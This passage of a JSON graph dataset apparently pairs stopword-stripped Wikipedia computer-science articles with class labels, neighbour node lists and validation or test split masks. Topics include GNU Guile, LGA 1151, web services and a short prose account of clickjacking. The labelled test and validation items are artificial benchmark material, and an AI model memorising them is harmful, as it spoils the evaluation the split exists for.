link layer implies functions wider scope network access important link layer protocols used probe topology local network discover routers neighboring hosts i.e functions go well beyond network access",
    "neighbors": [
      10242,
      1030,
      6670,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      98,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      7817,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      710,
      6345,
      8905,
      1229,
      5843,
      10461,
      7391,
      2785,
      3297,
      2797,
      4333,
      751,
      8432,
      8946,
      7411,
      3322,
      6403,
      9987,
      3847,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      7498,
      10058,
      11260,
      849,
      1876,
      11606,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      891,
      6524,
      6013,
      11647,
      10115,
      7049,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      5598,
      8670,
      10723,
      5092,
      10727,
      3564,
      4589,
      6651,
      3580,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10006,
    "label": 4,
    "text": "Firefox_Monitor:firefox monitor firefox monitor online service developed mozilla launched september 25 2018 informs users email address passwords used leaked data breaches using database provided pwned",
    "neighbors": [
      1664,
      6791,
      9736,
      1295,
      7951,
      2836,
      11418,
      9757,
      1713,
      7861,
      11449,
      5054,
      9152,
      9281,
      10057,
      2893,
      7889,
      5078,
      6231,
      10078,
      482,
      1251,
      10722,
      3941,
      8169,
      10860,
      6133,
      7543,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 10007,
    "label": 2,
    "text": "Symobi:symobi symobi system mobile applications proprietary modern mobile real-time operating system developed german company miray software since 2002 partly cooperation research team prof. dr. uwe baumgarten technical university munich graphical operating system designed area embedded mobile systems also often used pcs end users field industry basis symobi message-oriented operating system µnos part based real-time microkernel sphere µnos offers communication message passing processes basic operating system service processes application processes using integrated process manager lowest level responsibility sphere microkernel implement enforce security mechanisms resource management real-time symobi additionally offers complete graphical operating system environment system services consistent graphical user interface well standard programs drivers symobi combines features different fields application one operating system modern operating system offers separated isolated processes light-weight threads dynamic libraries like windows linux unix example area mobile embedded operating systems low resource requirement support mobile devices resembles systems like windows ce symbianos palm os conventional real-time operating systems like qnx vxworks shares real-time ability support different processor architectures development sphere µnos symobi based ideas work konrad foikis michael haunreiter founders company miray software initiated schooldays even started studying computer science basic concept combine useful necessary features like real-time portability modern characteristics like microkernel inter-process communication etc form stable reliable operating system originally supposed serve basis different application programs developed foikis haunreiter studies 2000 konrad foikis michael haunreiter founded company miray software realised µnos suited far use cooperation tu munich already evolved two years later 2006 first official version symobi completed autumn year introduced professional circles systems exhibition single-core multi-core symobi suited hand-held products portable communicators internet appliances well consumer appliances set-top boxes home gateways games consoles furthermore used areas automotive control infotainment systems industrial control systems motion control process control point sale cashier systems ticket machines information terminals operating system stands real-time microkernel multi-processor ability furthermore portable therefore bound specific hardware platforms symobi inter-process communication guarantees security flexibility modern architecture runs low resource requirements processor system memory system offers java-vm area standard appliances operating system yet widely spread rudimentary posix support restricted hardware support drivers addition symobi open source operating system present offer office applications email functions web browser",
    "neighbors": [
      2179,
      5029,
      7983,
      7187,
      9366
    ],
    "mask": "None"
  },
  {
    "node_id": 10008,
    "label": 9,
    "text": "George_Necula:george necula george ciprian necula romanian computer scientist engineer google former professor university california berkeley research area programming languages software engineering particular focus software verification formal methods best known ph.d. thesis work first describing proof-carrying code work received 2007 sigplan influential popl paper award originally baia mare romania necula attended polytechnic university bucharest coming carnegie mellon university united states complete ph.d. programming languages researcher peter lee ph.d. thesis first describing proof-carrying code influential mechanism allow untrusted machine code run safely without performance overhead joined faculty university california berkeley 1998 recently necula work focused open-source analysis verification transformation tools c including c intermediate language cil ccured deputy c intermediate language cil simplified subset c programming language well set tools transforming c programs language several tools use cil way access c abstract syntax tree programs frama-c framework analyze c programs compcert c compiler proven coq necula fellow okawa foundation alfred p. sloan foundation see sloan fellowship received grace murray hopper award 2001 national science foundation career award 1999 acm sigops hall fame award 2006",
    "neighbors": [
      9019,
      11099,
      3267,
      1316,
      8262,
      1613,
      2798,
      1236,
      8987,
      8924,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10009,
    "label": 2,
    "text": "Android_Eclair:android eclair android eclair codename android mobile operating system developed google fifth operating system android longer supported versions 2.0 2.1 unveiled october 26 2009 android 2.1 builds upon significant changes made android 1.6 donut default home screen eclair displays persistent google search bar across top screen camera app also redesigned numerous new camera features including flash support digital zoom scene mode white balance color effect macro focus photo gallery app also contains basic photo editing tools version also included addition live wallpapers allowing animation home-screen background images show movement speech-to-text first introduced replacing comma key android eclair inherits platform additions donut release ability search saved sms mms messages improved google maps 3.1.2 exchange support email app operating system also provides improved typing speed virtual keyboard along new accessibility calendar virtual private network apis internet browsing android eclair also adds support html5 refreshed browser ui bookmark thumbnails double-tap zoom",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      2630,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      2366,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10010,
    "label": 3,
    "text": "Bomberman_(1983_video_game):bomberman 1983 video game nes/famicom release eponymous character bomberman robot must find way maze avoiding enemies doors leading maze rooms found rocks bomberman must destroy bombs items help improve bomberman bombs fire ability improves blast range bombs bomberman turn human escapes reaches surface game 50 levels total original home computer games basic different rules bomberman written 1980 purely serve tech demo hudson soft basic compiler basic version game given small-scale release japanese pcs 1983 european pcs following year bomberman known nes/famicom version released japan december 19 1985 north america 1987 hudson soft director research development shinichi nakamoto commented 1995 interview personally believe famicom version bomberman one version game version ported back msx following year bomberman special bomberman appearance game hudson soft re-used enemy graphic taken 1984 nes/famicom port broderbund lode runner early version bomberman famous design robotic anime-like character pink antenna game also released game boy game b mode game atomic punk 2004 version bomberman re-released game boy advance part famicom mini series japan classic nes series north america europe released year n-gage remake/update also released sony playstation entitled bomberman japan europe renamed bomberman party edition us version features port original version single-player game well revised updated version pre-rendered 3d graphics contemporary audio updated graphics audio also used multiplayer aspect game",
    "neighbors": [
      9006,
      6109,
      10931,
      599,
      8925
    ],
    "mask": "Test"
  },
  {
    "node_id": 10011,
    "label": 9,
    "text": "Name_binding:name binding programming languages name binding association entities data and/or code identifiers identifier bound object said reference object machine languages built-in notion identifiers name-object bindings service notation programmer implemented programming languages binding intimately connected scoping scope determines names bind objects – locations program code lexically one possible execution paths temporally use identifier codice_1 context establishes binding codice_1 called binding defining occurrence occurrences e.g. expressions assignments subprogram calls identifier stands bound occurrences called applied occurrences example static binding direct c function call function referenced identifier change runtime example dynamic binding dynamic dispatch c++ virtual method call since specific type polymorphic object known runtime general executed function dynamically bound take example following java code codice_3 interface codice_4 must refer subtype reference codice_5 codice_6 subtype codice_3 actual method referenced codice_8 known runtime c instance dynamic binding may call function pointed variable expression function pointer type whose value unknown actually gets evaluated run-time rebinding confused mutation consider following java code identifier codice_4 initially references nothing uninitialized rebound reference object linked list strings linked list referenced codice_4 mutated adding string list lastly codice_4 rebound codice_12 late static binding variant binding somewhere static dynamic binding consider following php example example php interpreter binds keyword codice_13 inside codice_14 class codice_15 call codice_16 produces string hello semantics codice_17 based late static binding result would bye beginning php version 5.3 late static binding supported specifically codice_17 changed codice_19 shown following block keyword codice_20 would bound runtime result call codice_16 would bye",
    "neighbors": [
      386,
      4231,
      8587,
      10510,
      655,
      6160,
      9497,
      11674,
      8221,
      10532,
      5677,
      11574,
      1591,
      10684,
      1343,
      8644,
      8262,
      2505,
      8531,
      10581,
      5213,
      11361,
      10470,
      8303,
      369,
      2936,
      3705,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10012,
    "label": 9,
    "text": "GNU_Guile:gnu guile gnu ubiquitous intelligent language extensions gnu guile preferred extension language system gnu project features implementation programming language scheme first version released 1993 addition large parts scheme standards guile scheme includes modularized extensions many different programming tasks extending programs guile offers libguile allows language embedded programs integrated closely c language application programming interface api similarly new data types subroutines defined c api made available extensions guile guile used programs gnucash lilypond gnu guix guix system distribution guixsd gnu debugger guile scheme general-purpose high-level programming language whose flexibility allows expressing concepts fewer lines code would possible languages c. example hygienic macro system allows adding domain specific syntax-elements without modifying guile guile implements scheme standard r5rs r6rs several scheme requests implementation srfi many extensions core idea guile scheme developer implements critical algorithms data structures c c++ exports functions types use interpreted code application becomes library primitives orchestrated interpreter combining efficiency compiled code flexibility interpretation thus guile scheme languages implemented guile extended new data types subroutines implemented c api standard distribution offers modules portable operating system interface posix system calls scheduling foreign function interface s-expression based xml processing sxml sxpath sxslt http world wide web apis delimited continuations array programming functionality guile programs use facilities slib portable scheme library using continuations call/cc requirement scheme standard guile copies execution stack heap back foreign code may pointers scheme objects guile uses conservative boehm–demers–weiser bdw garbage collector guile manual gives details inception early history language brief summary follows success emacs free software community highly extensible customizable application via extension partly implementation language emacs lisp community began consider design strategy could apply rest gnu system tom lord initially began work embeddable language runtime named gnu extension language gel based aubrey jaffer scheme implementation scm turn based george carrette siod lord convinced richard stallman make gel official extension language gnu project based argument scheme cleaner lisp dialect emacs lisp gel could evolve implement languages runtime namely emacs lisp lord discovered gel naming conflict another programming language solicited suggestions new name several contributions several usenet newsgroups lord controversially chose guile suggestion lee thomas development guile gel public release extension language tcl gaining popularity pushed universal extension language stallman saw tcl underpowered extension language posted criticism comp.lang.tcl newsgroup initiated flamewar known tcl war since public announcement guile project coincided tcl debate become common misconception guile began reaction initial release guile development languished many years 2009–2010 saw major improvements guile 2.0 released 2011 new compiler infrastructure virtual machine implementation switch boehm–demers–weiser garbage collector many improvements guile scheme language major changes one goals guile allow languages used alongside scheme guile would effectively language-neutral runtime environment various attempts made past versions dialect scheme essentially differing c-like syntax translation emacs lisp tcl converter motivated tkwww something roughly resembling language logo version 2.0 project successfully transitioned compiler tower approach allowing definition compilers one language another typically higher-level one lower-level intermediate representation eventually virtual machine bytecode native machine code several past unfinished attempts replace supplement emacs emacs lisp elisp extension language guile parallel efforts supporting languages guile version 2.0 guile new attempt implementing elisp guile compiler tower replacing emacs elisp implementation libguile begun made significant progress google summer code projects guile-based emacs could offer better execution performance emacs lisp support new emacs lisp language features easily make guile libraries written programming languages available emacs lisp code allow writing emacs extensions programming languages supported guile remaining fully backward compatible existing emacs lisp code bases implementation reached stage guile emacs able reliably run emacs lisp code remaining problems possible problems involve different internal representation emacs lisp strings scheme strings difference emacs lisp scheme treat boolean false empty list objects emacs lisp macros integrating scheme emacs lisp designed concurrency portability guile platforms supported emacs concerns raised emacs community include relative sizes emacs guile communities whether would cause splitting community emacs extensible programming languages emacs lisp",
    "neighbors": [
      10752,
      2050,
      9730,
      4101,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      1556,
      9749,
      8728,
      4633,
      4122,
      3618,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      10822,
      5703,
      1613,
      9299,
      10841,
      3674,
      3675,
      7267,
      2660,
      8293,
      2666,
      8304,
      9330,
      9843,
      5751,
      119,
      7805,
      2180,
      1159,
      9865,
      9877,
      5803,
      6828,
      2225,
      692,
      6840,
      7867,
      4799,
      7880,
      5833,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      10464,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      8436,
      9975,
      6906,
      7421,
      2304,
      4865,
      4867,
      5380,
      3334,
      1799,
      3336,
      6919,
      1301,
      791,
      3869,
      2335,
      2849,
      802,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      8021,
      2392,
      1889,
      10083,
      6502,
      11625,
      9579,
      1394,
      3446,
      10104,
      377,
      4992,
      11654,
      7562,
      4493,
      5008,
      1939,
      7067,
      6556,
      6047,
      1952,
      10145,
      4516,
      5031,
      1448,
      5033,
      9128,
      5040,
      5555,
      8628,
      438,
      9148,
      10687,
      7616,
      5569,
      6594,
      4550,
      10703,
      11218,
      8147,
      10712,
      2010,
      3034,
      479,
      9696,
      3051,
      5611,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10013,
    "label": 9,
    "text": "Compile_time:compile time computer science compile time refers either operations performed compiler compile-time operations programming language requirements must met source code successfully compiled compile-time requirements properties program reasoned compilation compile time refers time duration statements written programming language checked errors operations performed compile time usually include syntax analysis various kinds semantic analysis e.g. type checks instantiation template code generation programming language definitions usually specify compile time requirements source code must meet successfully compiled example languages may stipulate amount storage required types variables deduced properties program reasoned compile time include range-checks e.g. proving array index exceed array bounds deadlock freedom concurrent languages timings e.g. proving sequence code takes allocated amount time compile time occurs link time output one compiled files joined together runtime program executed programming languages may necessary compilation linking occur runtime trade-off compile-time link-time many compile time operations deferred link-time without incurring extra run-time compile time also refer amount time required compilation",
    "neighbors": [
      1409,
      7173,
      8582,
      263,
      393,
      139,
      10510,
      4112,
      9875,
      1175,
      11160,
      8221,
      6815,
      1952,
      8609,
      6818,
      7462,
      9003,
      2808,
      2620,
      4668,
      5948,
      1343,
      10176,
      8262,
      6477,
      10703,
      9680,
      7889,
      2386,
      6228,
      3413,
      8280,
      5466,
      11610,
      4572,
      3553,
      11361,
      8037,
      10470,
      8554,
      10991,
      5872,
      3186,
      5363,
      2804,
      4596,
      9714,
      2039,
      2936,
      10739,
      2556,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10014,
    "label": 7,
    "text": "Data_Processing_Iran_Co.:data processing iran co. data processing iran company dpi computer technology consulting corporation headquartered tehran iran dpi currently largest technology provider iran dpi manufactures sells computer hardware software focus latter offers infrastructure services hosting services consulting services areas ranging mainframe computers nanotechnology company also offers series internet-related services namely dedicated servers colocation services web hosting services shared hosting shared mail dns recording domain registration services managed services including network services security solutions managed application services storage backup solutions monitoring reporting professional services dpi established 1959 regional branch ibm corporation company operated subsidiary 1981 ibm operations iran ceded iranian government 2001 dpi became private company listed tehran stock exchange company history dpi signed numerous technology-sharing agreements software companies including mindscape dataproducts hypercom current members board directors dpi",
    "neighbors": [
      3323,
      2887
    ],
    "mask": "None"
  },
  {
    "node_id": 10015,
    "label": 4,
    "text": "Social_jacking:social jacking social jacking malicious technique tricking users clicking vulnerable buttons compromise showing false appearing pages mixture click jacking technique breach browser security social engineering may also referred user interface disguising method variant click jacking method original page vulnerable page loaded using iframe tag unnecessary contents webpage displayed iframe removed placing white background div tag elements using absolute positioning property using css thus unnecessary information displayed vulnerable page removed buttons links alone made visible user additional social engineering messages like click button get access get reward displayed iframe tag user made click visible button without knowing happens clicks button prevention methods quite tough user identifying analyzing webpages click anonymous links buttons social jacking easily implemented using google web toolkit design webpage using wysiwyg gui builder drag white background colored panel iframe window thus hiding unnecessary information revealing vulnerable buttons alone",
    "neighbors": [
      7044,
      3941,
      4198,
      3643,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 10016,
    "label": 2,
    "text": "User_space:user space modern computer operating system usually segregates virtual memory kernel space user space primarily separation serves provide memory protection hardware protection malicious errant software behaviour kernel space strictly reserved running privileged operating system kernel kernel extensions device drivers contrast user space memory area application software drivers execute term userland user space refers code runs outside operating system kernel userland usually refers various programs libraries operating system uses interact kernel software performs input/output manipulates file system objects application software etc user space process normally runs virtual memory space unless explicitly allowed access memory processes basis memory protection today mainstream operating systems building block privilege separation separate user mode also used build efficient virtual machines – see popek goldberg virtualization requirements enough privileges processes request kernel map part another process memory space case debuggers programs also request shared memory regions processes although techniques also available allow inter-process communication common way implementing user mode separate kernel mode involves operating system protection rings another approach taken experimental operating systems single address space software rely programming language semantics make sure arbitrary memory accessed – applications simply acquire references objects allowed access approach implemented jxos unununium well microsoft singularity research project",
    "neighbors": [
      6153,
      6155,
      8214,
      25,
      6180,
      8242,
      8248,
      59,
      4161,
      6213,
      8268,
      4173,
      6221,
      89,
      10333,
      97,
      6244,
      8296,
      8298,
      4207,
      8304,
      2168,
      2179,
      4238,
      10382,
      2193,
      2194,
      6296,
      2201,
      8344,
      10407,
      4268,
      8364,
      178,
      2228,
      10422,
      4279,
      6329,
      8388,
      2248,
      6352,
      8410,
      225,
      2278,
      233,
      10480,
      242,
      10482,
      8438,
      8439,
      4349,
      8445,
      10499,
      4367,
      273,
      2334,
      292,
      6438,
      295,
      2345,
      6445,
      2355,
      4409,
      6459,
      318,
      4423,
      2383,
      10590,
      8551,
      376,
      8573,
      2432,
      394,
      4492,
      4493,
      8602,
      414,
      2462,
      421,
      4521,
      4525,
      8621,
      10676,
      439,
      457,
      2529,
      6625,
      8676,
      10730,
      10731,
      10732,
      4589,
      8687,
      6652,
      2558,
      2560,
      516,
      4616,
      8721,
      6675,
      8725,
      10776,
      4637,
      10785,
      4643,
      10803,
      10809,
      10813,
      576,
      2625,
      4673,
      8772,
      589,
      593,
      6760,
      10856,
      10860,
      4727,
      634,
      4734,
      6787,
      10883,
      10891,
      6797,
      8852,
      2711,
      6808,
      10908,
      2723,
      10924,
      8879,
      6837,
      10933,
      8889,
      2762,
      4831,
      8928,
      6898,
      2804,
      2809,
      2811,
      8976,
      8977,
      787,
      789,
      6934,
      4887,
      792,
      8992,
      4902,
      4908,
      823,
      6968,
      11075,
      11079,
      6988,
      850,
      11095,
      9054,
      2914,
      9064,
      7020,
      4978,
      7027,
      9074,
      2933,
      7039,
      900,
      2949,
      7049,
      7057,
      2967,
      5022,
      5028,
      935,
      11184,
      3006,
      9151,
      11204,
      11205,
      9166,
      7136,
      3042,
      3055,
      5105,
      5115,
      3068,
      3082,
      7187,
      3097,
      9244,
      5158,
      11305,
      7217,
      7249,
      3160,
      11363,
      5222,
      7285,
      9335,
      1147,
      5244,
      3197,
      1150,
      5247,
      9342,
      9343,
      11388,
      11390,
      11391,
      9353,
      9366,
      9370,
      7325,
      11424,
      3235,
      9391,
      3248,
      3250,
      7379,
      7382,
      9436,
      9437,
      1247,
      5343,
      11489,
      1253,
      7403,
      5356,
      9452,
      11506,
      5363,
      11513,
      9466,
      9468,
      1278,
      5378,
      1291,
      11539,
      5397,
      5406,
      7477,
      5432,
      7483,
      9533,
      9547,
      5452,
      5457,
      11601,
      7507,
      11606,
      7511,
      9567,
      3426,
      5484,
      9580,
      7534,
      11635,
      5492,
      7540,
      11638,
      11644,
      7561,
      5514,
      1422,
      11667,
      7572,
      9621,
      1431,
      11674,
      11675,
      11678,
      7584,
      1442,
      1444,
      1445,
      9637,
      11689,
      9643,
      9646,
      1455,
      1456,
      7601,
      7603,
      1461,
      9667,
      9693,
      5598,
      1513,
      1515,
      5619,
      5620,
      7689,
      9762,
      1574,
      1580,
      9784,
      1632,
      3684,
      1637,
      3685,
      9835,
      9839,
      7821,
      3734,
      9882,
      1694,
      9887,
      9899,
      7854,
      9907,
      5822,
      5823,
      5824,
      9927,
      1736,
      9931,
      9932,
      5840,
      3795,
      7913,
      9964,
      1776,
      7920,
      1801,
      1804,
      7983,
      7992,
      7999,
      1858,
      3911,
      10063,
      5975,
      8033,
      10091,
      8063,
      10113,
      8066,
      8069,
      3978,
      8092,
      6049,
      10149,
      8106,
      4011,
      8112,
      1972,
      8119,
      6075,
      6078,
      4040,
      8136,
      2010,
      2015,
      2021,
      6120,
      6128,
      2036,
      8186,
      10235,
      2044,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10017,
    "label": 4,
    "text": "Korea_Internet_&_Security_Agency:korea internet amp security agency korea internet security agency 한국인터넷진흥원 kisa ministry science ict sub-organization dealing allocation maintenance south korea ipv4/ipv6 address space related whois information autonomous system numbers .kr country code top-level domain cctld also responsible cybersecurity internet within south korea runs korea computer emergency response team coordination center a.k.a krcert/cc private sector country roles include limited promotion safe internet usage internet culture detecting analyzing malware/virus web privacy protection operating root ca education internet cybersecurity various cybersecurity issues organization created july 2009 three different agencies merged one organization korea information security agency kisa national internet development agency nida korean international cooperation agency kiica kisa internet information security promotion organization korea aim improve global competitiveness korea ’ internet industry kisa set ‘ internet promotion ’ future ‘ information security ’ safety primary tasks focusing enhancing information security capacity korea ’ ict industry expanding global cooperative partnership based k-ict security development strategy krcert/cc internal division kisa csirt national responsibility focal point contact korea international cybersecurity incident handling cooperates interacts locally national cyber security center national intelligence service korea relevant stakeholders including local internet service providers cybersecurity vendors also interacts national csirts global cybersecurity vendors krcert/cc memberships asia pacific computer emergency response team apcert forum incident response security teams first kisa also 4 regional offices overseas located oman middle east region indonesia southeast asia costa rica latin america caribbean tanzania africa roles facilitate inter-governmental cooperation including b2b/b2g/g2b introduce talented korean cybersecurity enterprises global market",
    "neighbors": [
      8204,
      11510,
      7515,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 10018,
    "label": 3,
    "text": "FS-A1WSX:fs-a1wsx panasonic fs-a1wsx last msx2+ made panasonic successor fs-a1wx incorporated changes like s-video output tape support color printer support improved a1 internal cockpit software kanji color word processor contrary msx2+ systems panasonic fs-a1 used z-80 compatible msx-engine t9769x could switched via software 6 mhz model supported 256 kb ram little soldering 512 kb also possible complicated modification",
    "neighbors": [
      5128,
      9006,
      7983,
      5265,
      4409,
      11261
    ],
    "mask": "None"
  },
  {
    "node_id": 10019,
    "label": 3,
    "text": "LGA_1151:lga 1151 lga 1151 also known socket h4 intel microprocessor compatible socket comes two distinct versions first revision supports intel skylake kaby lake cpus second revision supports coffee lake cpus exclusively lga 1151 designed replacement lga 1150 known socket h3 lga 1151 1151 protruding pins make contact pads processor fully integrated voltage regulator i.e voltage regulator integrated cpu die introduced haswell broadwell moved motherboard motherboards first revision socket support solely ddr4 memory lesser number support ddr3 l memory least number slots ddr4 ddr3 l one memory type installed unidimm support enabling either type memory placed dimm rather separate ddr3 ddr4 dimms second revision socket motherboards support ddr4 memory skylake kaby lake coffee lake chipsets support vt-d intel rapid storage technology intel clear video technology intel wireless display technology appropriate cpu required motherboards lga 1151 socket support varying video outputs dvi hdmi 1.4 displayport 1.2 – depending model vga output optional since intel dropped support video interface starting skylake hdmi 2.0 4k 60 hz supported motherboards equipped intel ’ alpine ridge thunderbolt controller skylake kaby lake coffee lake chipsets support legacy conventional pci interface however motherboard vendors may implement using external chips 4 holes fastening heatsink motherboard placed square lateral length 75 mm intel sockets lga 1156 lga 1155 lga 1150 lga 1151 cooling solutions therefore interchangeable intel officially states skylake kaby lake integrated memory controllers imc support ddr3l memory modules rated 1.35 v ddr4 1.2 v led speculation higher voltages ddr3 modules could damage destroy imc processor meanwhile asrock gigabyte asus guarantee skylake kaby lake ddr3 motherboards support ddr3 modules rated 1.5 1.65v equivalent kaby lake chipset analogous h110 chipset four additional pch pci-e lanes kaby lake chipsets reserved implementing m.2 slot support intel optane memory otherwise corresponding kaby lake skylake chipsets practically light blue indicates difference comparable skylake kaby lake chipsets lga 1151 socket revised coffee lake generation cpus comes along intel 300-series chipsets physical dimensions remain unchanged updated socket re-assigns reserved pins adding power ground lines support requirements 6-core 8-core cpus new socket also relocates processor detection pin breaking compatibility earlier processors motherboards result desktop coffee lake cpus officially compatible 100 original skylake 200 kaby lake series chipsets similarly 300 series chipsets officially support coffee lake compatible skylake kaby lake cpus socket 1151 rev 2 sometimes also referred 1151-2 like kaby lake chipsets four additional pch pci-e lanes coffee lake chipsets reserved implementing m.2 slot support intel optane memory 22nm version h310 chipset h310c sold china motherboards based chipset support ddr3 memory well nowiki /nowiki yes however motherboards require bios update order support 9th gen coffee lake cpus nowiki ** /nowiki depends oem implementation",
    "neighbors": [
      3588,
      5901,
      5649,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      4523,
      2604,
      2350,
      6192,
      8625,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9057,
      9570,
      10468,
      613,
      1000,
      8552,
      1260,
      4717,
      4334,
      10225,
      371,
      9592,
      8442,
      5883
    ],
    "mask": "None"
  },
  {
    "node_id": 10020,
    "label": 8,
    "text": "Web_service:web service term web service ws either web service web technology http — originally designed human-to-machine communication — used transferring machine-readable file formats xml json practice web service commonly provides object-oriented web-based interface database server utilized example another web server mobile app provides user interface end user many organizations provide data formatted html pages also provide data server xml json often web service allow syndication example wikipedia another application offered end user may mashup web server consumes several web services different machines compiles content one user interface asynchronous javascript xml ajax dominant technology web services developing combination http servers javascript clients plain old xml distinct soap w3c web services frequently used json well instead xml representational state transfer rest architecture well-behaved web services function internet scale 2004 document w3c sets following rest key distinguishing feature web services number web services use markup languages web api development web services emphasis moving simpler representational state transfer rest based communications restful apis require xml-based web service protocols soap wsdl support interfaces relation w3c web services w3c defined web service w3c web services may use soap http protocol allowing less costly efficient interactions internet via proprietary solutions like edi/b2b besides soap http web services also implemented reliable transport mechanisms like ftp 2002 document web services architecture working group defined web services architecture requiring standardized implementation web service term web service describes standardized way integrating web-based applications using xml soap wsdl uddi open standards internet protocol backbone xml data format used contain data provide metadata around soap used transfer data wsdl used describing services available uddi lists services available web service method communication two electronic devices network software function provided network address web service always concept utility computing many organizations use multiple software systems management different software systems often need exchange data web service method communication allows two software systems exchange data internet software system requests data called service requester whereas software system would process request provide data called service provider different software may use different programming languages hence need method data exchange n't depend upon particular programming language types software however interpret xml tags thus web services use xml files data exchange rules communication different systems need defined rules communication defined file called wsdl web services description language codice_1 extension proposals autonomous web services aws seek develop flexible web services rely strict rules directory called uddi universal description discovery integration defines software system contacted type data one software system needs one particular report/data would go uddi find systems contact receiving data software system finds systems contact would contact system using special protocol called soap simple object access protocol service provider system would first validate data request referring wsdl file process request send data soap protocol automated tools aid creation web service services using wsdl possible either automatically generate wsdl existing classes bottom-up model generate class skeleton given existing wsdl top-down model critics non-restful web services often complain complex based upon large software vendors integrators rather typical open source implementations also concerns performance due web services use xml message format soap/http enveloping transporting functional non-functional testing web services done help wsdl parsing regression testing performed identifying changes made upgrade software web service regression testing needs categorized three different ways namely changes wsdl changes code selective re-testing operations capture three needs three intermediate forms subset wsdl namely difference wsdl dwsdl unit wsdl uwsdl reduced wsdl rwsdl respectively three subset wsdls combined form combined wsdl cwsdl used regression testing web service help automated web service change management awscm performing selection relevant test cases construct reduced test suite old test suite web services testing also automated using several test automation tools like soap ui oracle application testing suite oats unified functional testing selenium etc work related capture visualization changes made web service visualization computation changes done form intermediate artifacts subset wsdl insight computation change impact helpful testing top-down development reduce regression testing awscm tool identify subset operations wsdl file construct subset wsdl",
    "neighbors": [
      0,
      9734,
      7175,
      8201,
      4107,
      7179,
      8203,
      9229,
      8208,
      1556,
      10271,
      545,
      7713,
      5669,
      7212,
      1069,
      10284,
      8751,
      4658,
      2106,
      7742,
      1095,
      2119,
      1097,
      10313,
      10829,
      4688,
      7248,
      90,
      5210,
      1628,
      7261,
      11359,
      4707,
      7779,
      8806,
      1128,
      7784,
      9834,
      9841,
      119,
      1657,
      124,
      8317,
      10877,
      10878,
      133,
      140,
      6284,
      5774,
      3729,
      5782,
      5787,
      10396,
      5789,
      158,
      1185,
      5283,
      7846,
      4778,
      5295,
      2736,
      7855,
      2739,
      4788,
      5303,
      6328,
      4795,
      4797,
      6334,
      5314,
      7364,
      3269,
      198,
      5830,
      6856,
      7878,
      8392,
      9415,
      2252,
      10949,
      3278,
      11466,
      6353,
      5849,
      6875,
      10460,
      7389,
      6366,
      735,
      225,
      9441,
      10465,
      3302,
      8425,
      10486,
      5370,
      7930,
      5372,
      10492,
      8446,
      3839,
      769,
      2818,
      8451,
      9988,
      1802,
      10506,
      3341,
      1808,
      2835,
      10517,
      11030,
      5915,
      10526,
      11040,
      9505,
      6948,
      4901,
      11556,
      9514,
      10026,
      4397,
      3894,
      9015,
      10553,
      1851,
      3388,
      317,
      11582,
      4927,
      1856,
      322,
      5956,
      5446,
      5449,
      3920,
      6483,
      862,
      4959,
      4960,
      865,
      5472,
      11103,
      3428,
      3941,
      11105,
      11616,
      10090,
      4974,
      6002,
      4979,
      6007,
      6522,
      3966,
      10624,
      3971,
      8070,
      6027,
      3986,
      11154,
      8597,
      11674,
      3997,
      9631,
      8096,
      2465,
      7592,
      1964,
      431,
      6067,
      2485,
      11189,
      5048,
      6073,
      8122,
      9144,
      1468,
      3517,
      3518,
      6079,
      3008,
      3521,
      7613,
      7614,
      1476,
      2501,
      8644,
      11201,
      1481,
      458,
      9675,
      974,
      2002,
      8149,
      5593,
      479,
      3558,
      3560,
      4074,
      2027,
      10681,
      6127,
      8689,
      10229,
      8183,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 10021,
    "label": 7,
